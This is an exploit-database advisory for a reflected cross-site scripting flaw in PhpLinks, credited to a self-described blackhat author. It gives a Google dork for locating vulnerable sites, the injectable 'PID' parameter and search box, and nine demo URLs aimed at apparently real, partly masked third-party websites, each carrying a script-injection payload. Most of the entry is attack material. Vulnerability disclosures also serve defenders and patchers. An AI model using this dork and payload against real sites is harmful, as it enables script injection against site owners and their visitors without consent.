Bug: PhpLinks Cross Site Scripting Vulnerability ( Ascii Version )

Search:
WLB2

PhpLinks Cross Site Scripting Vulnerability

Published
Credit
Risk
2013.09.15
Arsan
Low
CWE
CVE
Local
Remote
CWE-79
N/A ( Add )
No
Yes
 Dork: inurl:"/index.php?PID=" intext:"Powered By phpLinks"

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: PhpLinks Cross Site Scripting Vulnerability
# Date: 2013 15 September
# Author: Arsan
# Vendor Homepage: www.newphplinks.com
# Version : All Version
# Tested on: Linux & Windows
# Category: webapps
# Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# http://<server>/index.php?PID=[XSS]
# http://<server>/[XSS In SearchBox]
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# www.nXuth.com/index.php?PID=5"><script>alert(/Arsan/)</script>
# www.eXeli.at/phplinks/index.php?PID=5"><script>alert(/Arsan/)</script>
# www.ingegnXambientali.it/cercambiente/index.php?PID=5"><script>alert(/Arsan/)</script>
# www.tourisXfo.it/index.php?PID=205"><script>alert(/Arsan/)</script>
# www.lupuXnce-timbres.net/index.php?PID=10"><script>alert(/Arsan/)</script>
# www.links.sXlbard.com/index.php?PID=3"><script>alert(/Arsan/)</script>
# www.X.com/links/index.php?PID=6"><script>alert(/Arsan/)</script>
# www.dietrX.kracht.free.fr/phplinks/index.php?PID=4"><script>alert(/Arsan/)</script>
# www.myXcom.tw/avlinks/index.php?PID=5"><script>alert(/Arsan/)</script>
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
# Arsan.Blackhat@gmail.com
# Twitter.com/ArsanBlackhat
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version